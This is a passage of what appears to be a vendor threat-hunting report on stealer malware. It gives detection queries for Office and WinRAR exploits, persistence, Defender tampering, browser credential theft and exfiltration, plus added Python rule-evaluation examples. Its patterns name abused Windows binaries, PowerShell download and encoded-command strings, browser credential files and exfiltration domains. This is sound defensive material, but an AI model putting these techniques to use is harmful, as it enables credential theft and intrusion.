      "*\msbuild.exe", "*\msdt.exe", "*\mshta.exe", "*\msidb.exe",
      "*\msiexec.exe", "*\msxsl.exe", "*\odbcconf.exe", "*\pcalua.exe",
      "*\powershell.exe", "*\pwsh.exe", "*\regasm.exe", "*\regsvcs.exe",
      "*\regsvr32.exe", "*\rundll32.exe", "*\schtasks.exe", "*\scrcons.exe",
      "*\scriptrunner.exe", "*\sh.exe", "*\svchost.exe", "*\verclsid.exe", "*\wmic.exe",
      "*\workfolders.exe", "*\wscript.exe", "*\AppData\*", "*\Users\Public\*",
      "*\ProgramData\*", "*\Windows\Tasks\*", "*\Windows\Temp\*",
      "*\Windows\System32\Tasks\*"]
    OR file in ["bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE",
      "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe",
      "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe",
      "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe",
      "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe",
      "WorkFolders.exe", "wscript.exe"])

Possible Exploitation of CVE-2017-11882

We have observed multiple stealer malware families exploiting CVE-2017-11882 for initial access and payload execution. The alert above covers the suspicious child processes spawned by Microsoft Office products; the following alert complements it by monitoring for suspicious child processes spawned by EQNEDT32.EXE (Equation Editor), catching any events the alert above may miss.

    label="Process" label=Create parent_process="*\EQNEDT32.exe"
    -"process" IN ["C:\Windows\System32\WerFault.exe", "C:\Windows\SysWOW64\WerFault.exe"]
Execution

As outlined in the preceding section, multiple vulnerabilities are exploited to achieve arbitrary code execution or to execute malware. In this section, we delve into techniques to detect these vulnerabilities and potential exploitation attempts.

Possible Exploitation of CVE-2023-38331

The distinctive characteristic of this vulnerability lies in WinRAR's creation of a file with a double extension. We can identify potential exploitation of CVE-2023-38331 by monitoring for files created by WinRAR whose name contains two extensions separated by a space.

label=File label="Create" label="Overwrite" path="*\AppData\Local\Temp\Rar$*"
| process regex("(?P<double_extension>(\.[a-zA-Z0-9]{1,4} \.[a-zA-Z0-9]{1,4}))", file)
| filter double_extension=*
| chart count() by "process", path, file, double_extension

After the double-extension file is created, it is unusual and suspicious for a file compression tool like WinRAR to spawn child processes such as the Windows command shell or PowerShell. Following successful exploitation of the vulnerability, the malicious payload may spawn these processes to execute arbitrary code, such as downloading a second stage. Therefore we can hunt for suspicious child processes spawned by WinRAR.exe to further prove our hypothesis.

label="Process" label="Create" parent_process="*\winRAR.exe"
"process" IN ["*\cmd.exe", "*\cscript.exe", "*\mshta.exe", "*\powershell.exe", "*\pwsh.exe",
  "*\regsvr32.exe", "*\rundll32.exe", "*\wscript.exe"]

LP_Process Pattern Match For CVE-2021-40444 Exploitation

Successful exploitation of CVE-2021-40444 triggers the spawning of control.exe by an Office application. The query below therefore gives analysts a key indicator to hunt for in process-creation events.

label="Process" label=Create "process"="*\control.exe"
parent_process IN ["*\winword.exe", "*\excel.exe", "*\powerpnt.exe"]
-command="*\control.exe input.dll"

Suspicious PowerShell Downloads Command

During execution, many stealer malware families have leveraged PowerShell for multiple malicious purposes, some primarily to download payloads or to employ fileless techniques. Therefore, we can use the following query to hunt for suspicious PowerShell download commands.

(label="Process" label="Create" command IN ["*.Download*", "*Net.WebClient*"])
OR (norm_id=WinServer event_id=4104 script_block="*System.Net.WebClient*" script_block="*Download*")
-user IN EXCLUDED_USERS

Suspicious File Execution Using Wscript or Cscript

VBS requires a scripting host, such as wscript.exe, to interpret and execute code, manage user interactions, handle output and errors, and provide a runtime environment. Therefore, we can use the following query to look for suspicious file execution by wscript.

label="Create" label="Process" "process" IN ["*\wscript.exe", "*\cscript.exe"]
-command="*.json*"
command IN ["*.jse*", "*.vbe*", "*.js*", "*.vba*", "*.vbs*", "*.wsf*"]

Suspicious PowerShell Invocation Based on Parent Process

Most malware heavily leverages PowerShell because of its wide range of capabilities, so one effective indicator is the parent process from which PowerShell is spawned. Therefore we can use the following query to look for suspicious PowerShell invocations.

label="process" label=create
parent_process IN ["*\mshta.exe", "*\wscript.exe", "*\cscript.exe", "*\rundll32.exe",
  "*\regsvr32.exe", "*\services.exe", "*\winword.exe", "*\wmiprvse.exe", "*\powerpnt.exe",
  "*\excel.exe", "*\msaccess.exe", "*\mspub.exe", "*\visio.exe", "*\outlook.exe",
  "*\amigo.exe", "*\chrome.exe", "*\firefox.exe", "*\iexplore.exe", "*\microsoftedgecp.exe",
  "*\microsoftedge.exe", "*\browser.exe", "*\vivaldi.exe", "*\safari.exe", "*\sqlagent.exe",
  "*\sqlserver.exe", "*\sqlservr.exe", "*\w3wp.exe", "*\httpd.exe", "*\nginx.exe",
  "*\php-cgi.exe", "*\jbosssvc.exe", "*MicrosoftEdgeSH.exe", "*tomcat*"]
"process"="*\powershell.exe"
-path="*\Health Service State\*"
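The process-tree rules in the Initial Access section (Office parent with a suspicious child, EQNEDT32 with any child other than WerFault) and the "Suspicious PowerShell Invocation Based on Parent Process" rule above all reduce to the same check: match the parent against one list, the child against another, apply exclusions. The following is an added example, not code from the report or from Logpoint, that applies all three to constructed Sysmon-style process-creation events. Field names follow the queries, the pattern lists are trimmed copies of the page's, and Python's fnmatch stands in for the query language's case-insensitive * wildcard (an assumption about its semantics).

```python
"""Added example (not Logpoint's code): evaluate the parent/child process rules
from the Initial Access and Execution queries over constructed events."""
from fnmatch import fnmatchcase

# Trimmed copies of the page's pattern lists.
OFFICE_PARENTS = [r"*\WINWORD.EXE", r"*\EXCEL.EXE", r"*\POWERPNT.exe", r"*\MSPUB.exe",
                  r"*\VISIO.exe", r"*\OUTLOOK.EXE", r"*\MSACCESS.EXE", r"*\EQNEDT32.EXE",
                  r"*\Onenote.exe", r"*\wordview.exe"]
SUSPICIOUS_CHILDREN = [r"*\cmd.exe", r"*\powershell.exe", r"*\pwsh.exe", r"*\mshta.exe",
                       r"*\wscript.exe", r"*\cscript.exe", r"*\rundll32.exe",
                       r"*\regsvr32.exe", r"*\certutil.exe", r"*\msiexec.exe",
                       r"*\AppData\*", r"*\Users\Public\*", r"*\ProgramData\*",
                       r"*\Windows\Temp\*"]
SUSPICIOUS_FILES = ["bitsadmin.exe", "CertUtil.exe", "Cmd.Exe", "MSHTA.EXE",
                    "PowerShell.EXE", "RUNDLL32.exe", "wscript.exe"]
WERFAULT = [r"C:\Windows\System32\WerFault.exe", r"C:\Windows\SysWOW64\WerFault.exe"]
POWERSHELL_PARENTS = [r"*\mshta.exe", r"*\wscript.exe", r"*\cscript.exe", r"*\rundll32.exe",
                      r"*\regsvr32.exe", r"*\winword.exe", r"*\excel.exe", r"*\chrome.exe",
                      r"*\firefox.exe", r"*\w3wp.exe", r"*\sqlservr.exe", r"*tomcat*"]


def matches(value, patterns):
    """Case-insensitive glob match; assumption: this is how the query's IN lists behave."""
    v = value.lower()
    return any(fnmatchcase(v, p.lower()) for p in patterns)


def classify(event):
    """Return the names of all rules the event triggers (empty list when nothing fires)."""
    parent, proc = event["parent_process"], event["process"]
    file, path = event.get("file", ""), event.get("path", "")
    hits = []
    # Equation Editor: any child except the crash handler is interesting.
    if matches(parent, [r"*\EQNEDT32.exe"]) and not matches(proc, WERFAULT):
        hits.append("eqnedt32_child")
    # Office parent with a LOLBin child or a child running from a user-writable directory.
    if matches(parent, OFFICE_PARENTS) and (matches(proc, SUSPICIOUS_CHILDREN)
                                            or matches(file, SUSPICIOUS_FILES)):
        hits.append("office_child")
    # PowerShell launched by a script host, browser, Office app or server process.
    if (matches(parent, POWERSHELL_PARENTS) and matches(proc, [r"*\powershell.exe"])
            and not matches(path, [r"*\Health Service State\*"])):
        hits.append("powershell_suspicious_parent")
    return hits


# Constructed sample events (Sysmon EventID 1 style fields), not real telemetry.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent_process": OFFICE + r"\WINWORD.EXE", "process": PS, "file": "PowerShell.EXE"},
    {"parent_process": OFFICE + r"\EXCEL.EXE",
     "process": r"C:\Users\bob\AppData\Roaming\update.exe", "file": "update.exe"},
    {"parent_process": EQNEDT, "process": r"C:\Users\bob\AppData\Local\Temp\a.exe", "file": "a.exe"},
    {"parent_process": EQNEDT, "process": r"C:\Windows\SysWOW64\WerFault.exe", "file": "WerFault.exe"},
    {"parent_process": r"C:\Windows\explorer.exe", "process": PS, "file": "PowerShell.EXE"},
    {"parent_process": r"C:\Windows\System32\wscript.exe", "process": PS, "file": "PowerShell.EXE"},
]


def triage(events):
    return [classify(e) for e in events]


if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{verdict or 'ok'}: {event['parent_process']} -> {event['process']}")
```

classify returns every rule an event trips rather than stopping at the first, which is what you want when one event should raise more than one alert (the EQNEDT32 sample fires both the Equation Editor rule and the generic Office rule). The WerFault exclusion is the only thing keeping a crashed Equation Editor from paging someone, so keep such exclusions narrow and path-qualified as the page's query does.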
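The CVE-2023-38331 hunt earlier in this section has two halves: the double-extension regex over WinRAR's temp directory, and the WinRAR-spawns-a-script-host check. Here is an added example, not the report's or Logpoint's code, that runs both over constructed Sysmon-style file-create and process-create events. The regex is the one from the query; the path and process patterns are the query's, and fnmatch stands in for the * wildcard (assumption).

```python
"""Added example (not Logpoint's code): CVE-2023-38331 double-extension and
WinRAR child-process checks over constructed events."""
import re
from fnmatch import fnmatchcase

# Same regex as the query: an extension, a space, then a second extension.
DOUBLE_EXT = re.compile(r"(?P<double_extension>\.[a-zA-Z0-9]{1,4} \.[a-zA-Z0-9]{1,4})")
RAR_TEMP = r"*\appdata\local\temp\rar$*"   # WinRAR's extraction scratch directory
WINRAR = r"*\winrar.exe"
SCRIPT_HOSTS = [r"*\cmd.exe", r"*\cscript.exe", r"*\mshta.exe", r"*\powershell.exe",
                r"*\pwsh.exe", r"*\regsvr32.exe", r"*\rundll32.exe", r"*\wscript.exe"]


def double_extension(filename):
    """Return the matched '.ext .ext' fragment, or None when the name is ordinary."""
    m = DOUBLE_EXT.search(filename)
    return m.group("double_extension") if m else None


def rar_double_extension_drop(event):
    """File-create event under Rar$ temp with a double extension -> the fragment, else None."""
    if not fnmatchcase(event["path"].lower(), RAR_TEMP):
        return None
    return double_extension(event["file"])


def winrar_spawned_script_host(event):
    """True when WinRAR is the parent and the child is a shell or script host."""
    proc = event["process"].lower()
    return (fnmatchcase(event["parent_process"].lower(), WINRAR)
            and any(fnmatchcase(proc, p) for p in SCRIPT_HOSTS))


def hunt(file_events, proc_events):
    """Combine both checks into one list of (rule, subject, detail) findings."""
    findings = []
    for e in file_events:
        frag = rar_double_extension_drop(e)
        if frag:
            findings.append(("double_extension", e["file"], frag))
    for e in proc_events:
        if winrar_spawned_script_host(e):
            findings.append(("winrar_child", e["process"], None))
    return findings


# Constructed samples (Sysmon EventID 11 and EventID 1 style), not real telemetry.
WINRAR_EXE = r"C:\Program Files\WinRAR\WinRAR.exe"
RAR_DIR = r"C:\Users\bob\AppData\Local\Temp\Rar$DIa1234.5678"
FILE_EVENTS = [
    {"process": WINRAR_EXE, "path": RAR_DIR, "file": "invoice.pdf .cmd"},   # the CVE pattern
    {"process": WINRAR_EXE, "path": RAR_DIR, "file": "invoice.pdf"},        # ordinary extract
    {"process": r"C:\Windows\explorer.exe", "path": r"C:\Users\bob\Downloads",
     "file": "photo.jpg .exe"},                                             # outside Rar$: ignored
]
PROC_EVENTS = [
    {"parent_process": WINRAR_EXE, "process": r"C:\Windows\System32\cmd.exe"},
    {"parent_process": WINRAR_EXE, "process": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for finding in hunt(FILE_EVENTS, PROC_EVENTS):
        print(finding)
```

The file check is deliberately scoped to the Rar$ directory, as the query is: a double extension elsewhere on disk is worth a look but is not this vulnerability. Correlating the two findings on the same host within a short window is what turns two medium-confidence signals into a high-confidence one.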
Persistence

Based on the above behavior analysis, it is evident that most stealer malware families exhibit similar persistence behavior. This is commonly achieved through modifications to the Registry Run keys or by leveraging Windows Scheduled Tasks.

Autorun Keys Modification Detected

We can use the query below to hunt for Registry Run key modifications by filtering on key directories such as the user's Startup folder and the ProgramData directory.

label=Registry label=Set label=Value -event_type=info
target_object IN ["*\software\Microsoft\Windows\CurrentVersion\Run*",
  "*\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit*",
  "*\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell*",
  "*\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
  "*\software\Microsoft\Windows NT\CurrentVersion\Windows*",
  "*\software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders*"]
detail IN ["*C:\Windows\Temp\*", "*C:\$Recycle.bin\*", "*C:\Temp\*", "*C:\Users\Public\*",
  "*C:\ProgramData\*", "*C:\Users\Default\*", "*C:\Users\Desktop\*", "*\AppData\Local\*",
  "*Public\*", "*wscript*", "*cscript*", "*powershell.exe*"]
-detail="*\AppData\Local\Microsoft\Teams\Update.exe *"

Suspicious Scheduled Task Creation

We can hunt for the scheduling of binaries/files located in suspicious locations where scheduled tasks are not typically created.

norm_id=WinServer label=Schedule label=Task label=Create
command IN ["*C:\Users\*", "*C:\Windows\Temp\*", "*C:\ProgramData\*"]
-command="C:\ProgramData\Microsoft\Windows Defender\Platform\*"

Alternatively, we can use the query below to look for scheduled task creation via an XML file.

label=create label="process" "process"="*\schtasks.exe"
command IN ["*/create*", "*-create*"] command IN ["*/xml*", "*-xml*"]
(-integrity_level=system OR -integrity_label=*system*)
-command="*.xml*"
((-parent_process IN ["*:\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe",
  "*:\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe",
  "*:\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe",
  "*:\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe",
  "*:\Program Files\Dell\SupportAssist\pcdrcui.exe"])
 OR (-parent_process="*\rundll32.exe"
     command="*:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc"))

We can also look for Sysmon registry events (Event IDs 12, 13, 14) to detect modifications in the registry, and use the following query to hunt for the creation of scheduled tasks through registry events.

(label="Registry" label="Key" label="Map" event_type=CreateKey
"target_object"="*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\*"
-target_object IN ["*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator*"])

Privilege Escalation

To elevate privileges, Vidar and Remcos have been observed disabling UAC by modifying the registry key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA". We can use the query below to hunt for the disabling of UAC via the Registry.

norm_id=WindowsSysmon label=Registry label=Set label=Value target_object="*EnableLUA*"
detail="DWORD (0x00000000)" -user IN EXCLUDED_USERS

Defense Evasion

Suspicious PowerShell Parameter Substring Detected

It is common for threat actors and malware to leverage PowerShell because of its extensive functionality, for example to bypass execution policies or to conceal activity from the user interface. Therefore we use the query below to hunt for suspicious PowerShell parameter strings.

label="process" label=create "process" IN ["*\powershell.exe", "*\pwsh.exe"]
command IN ["*-wi*h*", "* -nopr*", "* -nonin*", "* -ec*", "* -en*", "* -executionp*",
  "* -e* bypass*", "* -sta *", "*FromBase64String*"]

Windows Defender Exclusion

As observed in the behavior analysis, a common trait among all stealer malware variants is the use of the Add-MpPreference cmdlet to modify Windows Defender configuration, often excluding specific files, paths, or extensions from scanning. We can use the query below to hunt for suspicious Windows Defender exclusions.
(label="Process" label="Create"
  command IN ["*-ExclusionPath*", "*-ExclusionExtension*", "*-ExclusionProcess*", "*-ExclusionIpAddress*"]
  command IN ["*Add-MpPreference*", "*Set-MpPreference*"])
OR (norm_id=WinServer event_id=4104
  script_block IN ["*-ExclusionPath*", "*-ExclusionExtension*", "*-ExclusionProcess*", "*-ExclusionIpAddress*"]
  script_block IN ["*Add-MpPreference*", "*Set-MpPreference*"])

Also, we can use the query below to hunt for Windows Registry key modifications indicative of attempts to disable various aspects of Windows Defender's real-time monitoring capabilities.

label=Registry label=Set
target_object IN ["*\SOFTWARE\Microsoft\Windows Defender*",
  "*\SOFTWARE\Policies\Microsoft\Windows Defender*"]
(
  detail="DWORD (0x00000001)"
  target_object IN ["*\DisableAntiSpyware", "*\DisableAntiVirus",
    "*\DisableBehaviorMonitoring", "*\DisableIntrusionPreventionSystem",
    "*\DisableIOAVProtection", "*\DisableOnAccessProtection",
    "*\DisableRealtimeMonitoring", "*\DisableScanOnRealtimeEnable",
    "*\DisableScriptScanning", "*\DisableEnhancedNotifications",
    "*\DisableBlockAtFirstSeen"]
)
OR
(
  detail="DWORD (0x00000000)"
  target_object IN ["*\App and Browser protection\DisallowExploitProtectionOverride",
    "*\Features\TamperProtection", "*\MpEngine\MpEnablePus", "*\PUAProtection",
    "*\Signature Update\ForceUpdateFromMU", "*\SpyNet\SpynetReporting",
    "*\SpyNet\SubmitSamplesConsent",
    "*\Windows Defender Exploit Guard\Controlled Folder Access\EnableControlledFolderAccess"]
)

Suspicious Taskkill Activity

Likewise, Redline Stealer and Vidar terminate processes and delete files from specified locations. We can use the following query to hunt for suspicious usage of taskkill.

label="Process" label=Create "process"="*\taskkill.exe"
(command="*f *" command="*im *") OR command="*IM *"

File Dropped in Suspicious Location

As we have observed in the behavior analysis, files are most often dropped within the Temp directory. Threat actors frequently use these directories to drop payloads because they can blend in with normal operations. Therefore, we can use the query below to hunt for suspicious files dropped in these locations.

norm_id=WindowsSysmon event_id=11
path IN ["C:\ProgramData*", "*\AppData\Local*", "*\AppData\Roaming*", "C:\Users\Public*"]
-"process" IN ["*\Microsoft Visual Studio\Installer\*\BackgroundDownload.exe",
  "C:\Windows\system32\cleanmgr.exe", "*\Microsoft\Windows Defender\*\MsMpEng.exe",
  "C:\Windows\SysWOW64\OneDriveSetup.exe", "*\AppData\Local\Microsoft\OneDrive*",
  "*\Microsoft\Windows Defender\platform\*\MpCmdRun.exe", "*\AppData\Local\Temp\mpam-*.exe"]
-file IN ["vs_setup_bootstrapper.exe", "DismHost.exe", "*_PSScriptPolicyTest*.ps1"]

Credential Access

Browser Credential Accessed

Stealer malware commonly targets browsers to steal sensitive data by accessing the directories where such information is stored. Therefore, we can hunt for access to browser files (Chrome, Edge, Brave, Firefox) by processes other than the browser itself.

label=File label=Access
((path IN ["*\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies*",
    "*\Appdata\Local\Chrome\User Data\Default\Login Data*",
    "*\AppData\Local\Google\Chrome\User Data\Local State*"]
  object_name IN ["*\Appdata\Local\Microsoft\Windows\WebCache\WebCacheV01.dat", "*\cookies.sqlite"])
 OR object_name IN ["*\Microsoft\Edge\User Data\Default\Web Data", "*Firefox*release\logins.json",
    "*firefox*release\key3.db", "*firefox*release\key4.db", "*\BraveSoftware\Brave-Browser\User Data*"])
-"process" IN ["*\firefox.exe", "*\chrome.exe", "C:\Program Files\*", "C:\Program Files (x86)\*",
  "C:\WINDOWS\system32\*", "*\MsMpEng.exe", "*\MpCopyAccelerator.exe", "*\thor64.exe", "*\thor.exe"]
-parent_process IN ["C:\Windows\System32\msiexec.exe"]
-("process"=system parent_process=idle)
"access"="Read*"

NOTE: The alert only covers the most used browsers. To monitor access to the credential files of other browsers, you must include the credential file name and exclude the browser process name. To generate logs for file operations, auditing must be enabled for the folders where the files are located.

Collection

Screen Capture via CopyFromScreen

As mentioned, the CopyFromScreen method is frequently employed for taking screenshots. We can use the query below to look for this method within script blocks.

norm_id=WinServer event_id=4104 script_block="*.CopyFromScreen*"

Clipboard Data Access Detected

One of the common methods for retrieving clipboard data is the Get-Clipboard PowerShell cmdlet. We can use the following query to hunt for clipboard data access.

(label="process" label=create ("process"="*\clip.exe" OR file="clip.exe"))
OR (script_block="*Get-Clipboard*" OR command="*Get-Clipboard*")

Command and Control

Network Connection to Suspicious Server

Threat actors frequently use platforms such as Telegram, Discord and Mastodon for command and control. Therefore, we can use the query below to look for connections associated with these platforms.

url IN ["*dl.dropboxusercontent.com*", "*.pastebin.com*", "*.githubusercontent.com*",
  "*cdn.discordapp.com/attachments*", "*mediafire.com*", "*userstorage.mega.co.nz*",
  "*mega.nz*", "*ddns.net*", "*.paste.ee*", "*.hastebin.com/raw/*", "*.ghostbin.co/*",
  "*ufile.io*", "*anonfiles.com*", "send.exploit.in*", "*transfer.sh*", "*privatlab.net*",
  "*privatlab.com*", "*sendspace.com*", "*pastetext.net*", "*pastebin.pl*", "*paste.ee*",
  "*api.telegram.org*"]
OR domain IN ["*dropboxusercontent.com*", "*pastebin.com*", "*.githubusercontent.com*",
  "*cdn.discordapp.com", "*mediafire.com*", "*userstorage.mega.co.nz",
  "*mega.nz*", "*ddns.net", "*.paste.ee", "*.hastebin.com", "*ghostbin.co",
  "*ufile.io", "*anonfiles.com", "send.exploit.in", "transfer.sh", "privatlab.net",
  "*privatlab.com", "*sendspace.com", "*pastetext.net", "*pastebin.pl", "*paste.e*",
  "*api.telegram.org"]
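The two Defense Evasion queries above ("Suspicious PowerShell Parameter Substring Detected" and "Windows Defender Exclusion") both work by substring matching on the command line or script block. The following added example, not the report's or Logpoint's code, applies the page's glob patterns to constructed command lines and adds the one step a substring query cannot take on its own: decoding an -EncodedCommand payload so that an Add-MpPreference exclusion hidden in Base64 is still matched. The regex used to find the encoded token and the decoding are this example's assumptions, not something the page describes.

```python
"""Added example (not Logpoint's code): PowerShell parameter and Defender-exclusion
substring checks, with -EncodedCommand payloads decoded before matching."""
import base64
import re
from fnmatch import fnmatchcase

# Globs copied from the two queries above.
PARAM_GLOBS = ["*-wi*h*", "* -nopr*", "* -nonin*", "* -ec*", "* -en*",
               "* -executionp*", "* -e* bypass*", "* -sta *", "*FromBase64String*"]
EXCLUSION_GLOBS = ["*-ExclusionPath*", "*-ExclusionExtension*",
                   "*-ExclusionProcess*", "*-ExclusionIpAddress*"]
MPPREF_GLOBS = ["*Add-MpPreference*", "*Set-MpPreference*"]
# Assumption: an encoded command is "-e", "-ec", "-enc" or "-encodedcommand" followed by Base64.
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def glob_any(text, globs):
    """Return the globs that match text, case-insensitively (assumed query semantics)."""
    t = text.lower()
    return [g for g in globs if fnmatchcase(t, g.lower())]


def decode_encoded_command(cmd):
    """Decode the Base64/UTF-16LE payload of an -EncodedCommand, or None if absent/invalid."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmd):
    """Flag suspicious parameters on the raw command line and Defender exclusions
    on the command line plus its decoded payload."""
    decoded = decode_encoded_command(cmd)
    text = cmd + ("\n" + decoded if decoded else "")
    findings = []
    if glob_any(text, EXCLUSION_GLOBS) and glob_any(text, MPPREF_GLOBS):
        findings.append("defender_exclusion")
    return {"suspicious_params": glob_any(cmd, PARAM_GLOBS),
            "decoded": decoded,
            "findings": findings}


def _encode(script):
    """Build the constructed sample's payload the way PowerShell expects it (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed samples, not captured telemetry.
SAMPLE_ENCODED = ("powershell.exe -NoProfile -WindowStyle Hidden -Enc "
                  + _encode(r"Add-MpPreference -ExclusionPath C:\Users\Public"))
SAMPLE_BENIGN = r"powershell.exe -File C:\scripts\backup.ps1"

if __name__ == "__main__":
    for cmd in (SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(analyze(cmd))
```

Without the decoding step the encoded sample would still trip the parameter rule (hidden window, -nopr, -en), but the exclusion rule would see only Base64 and stay silent; the page's query catches the same case through Script Block Logging (event 4104), which records the decoded script, so both telemetry sources are worth keeping.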
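The Autorun, EnableLUA and Windows Defender registry queries above share one shape: a value-name pattern on target_object paired with a data pattern on detail. The pairing matters because the DWORD semantics differ per key, Disable* values are dangerous when set to 1 while protection switches are dangerous when set to 0, and a rule that ignores the data would fire on an administrator re-enabling Tamper Protection. The following added example, not the report's or Logpoint's code, expresses those three queries as a rule table and evaluates constructed Sysmon EventID 13-style events against it; the lists are trimmed copies of the page's and fnmatch stands in for the * wildcard (assumption).

```python
"""Added example (not Logpoint's code): registry Set event rules from the Persistence,
Privilege Escalation and Defense Evasion queries, evaluated over constructed events."""
from fnmatch import fnmatchcase

DEFENDER_SCOPE = [r"*\software\microsoft\windows defender*",
                  r"*\software\policies\microsoft\windows defender*"]

# Lowercased, trimmed copies of the page's patterns.
RULES = [
    {"name": "autorun_key_suspicious_path",
     "targets": [r"*\software\microsoft\windows\currentversion\run*",
                 r"*\software\microsoft\windows nt\currentversion\winlogon\userinit*",
                 r"*\software\microsoft\windows nt\currentversion\winlogon\shell*",
                 r"*\microsoft\windows\currentversion\policies\explorer\run"],
     "details": [r"*c:\windows\temp\*", r"*c:\users\public\*", r"*c:\programdata\*",
                 r"*\appdata\local\*", r"*wscript*", r"*cscript*", r"*powershell.exe*"],
     "exclude_details": [r"*\appdata\local\microsoft\teams\update.exe *"]},
    {"name": "uac_disabled",
     "targets": [r"*enablelua*"], "details": ["dword (0x00000000)"]},
    {"name": "defender_feature_disabled", "scope": DEFENDER_SCOPE,
     "targets": [r"*\disableantispyware", r"*\disableantivirus", r"*\disablebehaviormonitoring",
                 r"*\disablerealtimemonitoring", r"*\disablescriptscanning",
                 r"*\disableblockatfirstseen"],
     "details": ["dword (0x00000001)"]},            # 1 = feature switched off
    {"name": "defender_protection_disabled", "scope": DEFENDER_SCOPE,
     "targets": [r"*\features\tamperprotection", r"*\mpengine\mpenablepus", r"*\puaprotection",
                 r"*\spynet\spynetreporting", r"*\spynet\submitsamplesconsent",
                 r"*\controlled folder access\enablecontrolledfolderaccess"],
     "details": ["dword (0x00000000)"]},            # 0 = protection switched off
]


def glob_any(value, patterns):
    v = value.lower()
    return any(fnmatchcase(v, p) for p in patterns)


def evaluate(event):
    """Return the names of every rule a registry Set event triggers."""
    target, detail = event["target_object"], event["detail"]
    hits = []
    for rule in RULES:
        if "scope" in rule and not glob_any(target, rule["scope"]):
            continue
        if not glob_any(target, rule["targets"]) or not glob_any(detail, rule["details"]):
            continue
        if glob_any(detail, rule.get("exclude_details", [])):
            continue
        hits.append(rule["name"])
    return hits


def evaluate_all(events):
    return [evaluate(e) for e in events]


# Constructed sample events (Sysmon EventID 13 style), not real telemetry.
SAMPLE_EVENTS = [
    {"target_object": r"HKU\S-1-5-21-1004\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "detail": r"C:\Users\Public\svc.exe"},
    {"target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "detail": "DWORD (0x00000000)"},
    {"target_object": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring",
     "detail": "DWORD (0x00000001)"},
    # Teams' own updater writes a Run key from AppData\Local: covered by the page's exclusion.
    {"target_object": r"HKU\S-1-5-21-1004\Software\Microsoft\Windows\CurrentVersion\Run\com.squirrel.Teams.Teams",
     "detail": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe --processStart Teams.exe"},
    # Tamper Protection being turned ON (1) is not an alert.
    {"target_object": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection",
     "detail": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, evaluate_all(SAMPLE_EVENTS)):
        print(hits or ["ok"], event["target_object"])
```

Keeping the rules as data rather than code makes the exclusion list reviewable: the Teams exclusion in the Autorun rule is copied from the page's query and is exactly the kind of entry that should be re-validated when the excluded product changes its installer.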
Exfiltration

Suspicious Outbound SMTP Connection

In some instances, AgentTesla has employed SMTP for data exfiltration. Therefore, we can use the following query to hunt for network events where the destination port is one of TCP ports 25, 587, 465 and 2525. To minimize false positives, mail clients such as Outlook and Thunderbird are excluded, as well as the default mail binary provided by Windows.

norm_id=WindowsSysmon event_id=3 destination_port IN [25,587,465,2525]
-"process" IN ["*C:\Program Files\Microsoft\Exchange Server*", "*\thunderbird.exe", "*\outlook.exe",
  "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_*\HxTsr.exe"]

Agent Tesla has also exfiltrated data over FTP. We can use the query below to look for network events where the destination or source port is TCP port 20 or 21. This query detects FTP connections, which can be further filtered to detect abnormal connections to a host.

(destination_port IN [20,21] OR source_port IN [20,21])

Investigation and Response using Logpoint Converged SIEM

Logpoint Converged SIEM provides a comprehensive security operations platform that combines SIEM, SOAR, threat intelligence, and EDR capabilities with AgentX, our native endpoint agent. It provides automated real-time threat investigation and remediation, as well as detailed visibility into existing endpoints. Osquery enables advanced threat hunting and forensic investigations. AgentX detects and contains compromised systems quickly by continuously monitoring endpoints for indicators of compromise and malicious behavior.

At Logpoint, our dedicated team of security researchers works tirelessly to ensure that our platform can effectively detect and prevent emerging threats such as stealer malware.
Through continuous development and refinement of prebuilt playbooks within Logpoint Converged SIEM, we strive to stay ahead of evolving attack techniques and provide robust defenses against such threats.

Phishing Investigation and Response

